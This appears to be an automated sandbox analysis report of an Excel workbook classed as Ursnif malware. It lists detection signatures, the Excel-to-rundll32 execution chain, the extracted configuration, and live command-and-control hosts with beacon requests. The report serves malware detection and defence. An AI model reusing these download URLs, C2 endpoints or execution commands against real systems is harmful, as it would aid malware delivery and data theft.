Play interactive tour

Edit tour

Analysis Report Attached_File_898318.xlsb

Overview

General Information

Sample Name:	Attached_File_898318.xlsb
Analysis ID:	350713
MD5:	a8532cadcdc6aa2ca92e78352727bd50
SHA1:	de9a89b9a1ac2778660695a982b9f34641fd3608
SHA256:	8c54fb4a33fef841a472e5c7d92b49c1d589a8af374e510331f72fb5a4189c4a
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Multi AV Scanner detection for domain / URL

Yara detected Ursnif

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found API chain indicative of debugger detection

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Writes registry values via WMI

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found evasive API chain checking for process token information

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Queries the installation date of Windows

Sample execution stops while process was sleeping (likely an evasion)

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

EXCEL.EXE (PID: 7052 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

rundll32.exe (PID: 4536 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 6688 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6764 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "300", "system": "7d20f8f4847cb6a63944d316a102ff61", "size": "201282", "crc": "2", "action": "00000000", "id": "2200", "time": "1612925042", "user": "3d11f4f58695dc15e71ab15cd7543d9b", "hash": "0xcf6ed071", "soft": "3"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 4536	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7052, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer, ProcessId: 4536

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: rundll32.exe.4536.2.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "300", "system": "7d20f8f4847cb6a63944d316a102ff61", "size": "201282", "crc": "2", "action": "00000000", "id": "2200", "time": "1612925042", "user": "3d11f4f58695dc15e71ab15cd7543d9b", "hash": "0xcf6ed071", "soft": "3"}

Multi AV Scanner detection for domain / URL

Show sources

Source: api10.laptok.at

Virustotal: Detection: 10%

Perma Link

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown

HTTPS traffic detected: 192.185.16.102:443 -> 192.168.2.6:49728 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:

Binary string: c:\OldMust\LevelChange\againstlaw\each.pdb source: 2200[1].dll.0.dr

Spreading:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_00A17DD8 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

2_2_00A17DD8

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2200[1].dll			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\ProgramData\ddg\11.dll			Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: 2200[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\rundll32.exe

Jump to behavior

Networking:

Source: Joe Sandbox View

ASN Name: GOOGLEUS GOOGLEUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.190.91
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.190.91
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.190.91
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.190.91
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.190.91
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.190.91
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.190.91
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.190.91
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.190.91
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.190.91
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.190.91
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.190.91

Source: global traffic	HTTP traffic detected: GET /campo/a/a HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 139.162.190.91Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/_2B3EC16o/ZAwFGYF9Vidd2jOtlAgm/mFihH4UJ9WRC5w2li3g/OmibLsmZh5kJggmEaLzXRw/GA804i0H_2FW_/2Bkfn2No/zd0HyzP1MHF3zy0EvBK150W/_2B_2F72Dj/XoTXOXEzn6drW_2F_/2Bb7rN2KKcCZ/KiFeG39_2BW/irWAdzICnBHe9A/JQjcMLSav9jkNFGwHtKAG/2eL5LYIsSV49BFxc/6fK4w6t6KL1u4HS/P5vv5cRA4KCaKMNSZL/6ARUH9_2F/EAxxwtglWrZsl5pAsfsN/hmQH9PGx0xVYwlQOUAn/SkTHJd4lg4vDyhmkAnMXCm/mjKfMaxW9/ggDtMvzus/3j HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/7tidwRkCPNkyKHRu/sM7SqYc7lDPAe2Y/LxU4hPUrQ8DyLrlP8w/Nv_2FoafN/Gi3x5QhAhJwP6RZeuOE3/JqQwpPFp6P_2Bgw1Ow4/YQbUpkvF6g4Fdj4IZHGtNs/drxOxsX9ra8ze/alAzZjOu/wfTEPlwQzX9RKEQJf5J8q2h/QY5MtTc_2B/fN9jwgMPnCxXHk4JM/h48AsZ0sO93u/BNd8Zp5c15S/_2FwZ_2FDNtvXf/0udmkslKsSD_2BqfUIpZ3/CB9K3mpzjq1wwzDp/YFrr1SvQi2fLHme/2BwbHda90Wbf3bIygC/3yPHqi_2B/qHeLcZQp_2BFoaOMMJJ4/L9wxE1UCA/P HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/quWyI8WCkgN/SXUvWGfiUm7T0f/lzSlHf7sO503xATuzHkPG/Uh6KISBL5d4ngtXF/8CCWBl9aRux0ggg/WjpeRnlHlxQpgYHWF7/SRgr07KRV/r5lQqK3B6jZkHZiIL4cT/yujdqTpvuL8V1NlvglB/sTzNC3Gtg_2Bwr4uzl4_2F/AC089ktgtaMkN/4Kgt2RLr/Ke14XkQchJOlvOHrYVkVyXU/P0CMvsMir5/NwrpznNArerCa8bkI/55ua2Ge0fpbQ/9kzo82khbwL/WEPiqQPRb97B8a/81xN3oY2Fv8ECPICx_2Be/nWcE6nEvng8OxAW2/XsEKKCKa1AcTuvo/k HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: urbandancecity.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 09 Feb 2021 17:44:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: sheet9.bin	String found in binary or memory: http://139.162.190.91/campo/a/a.D
Source: 2200[1].dll.0.dr	String found in binary or memory: http://majorleave.net
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://api.office.net
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://augloop.office.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://cdn.entity.
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://cortana.ai
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://cr.office.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://directory.services.
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://graph.windows.net
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://login.windows.local
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://management.azure.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://management.azure.com/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://ncus-000.contentsync.
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
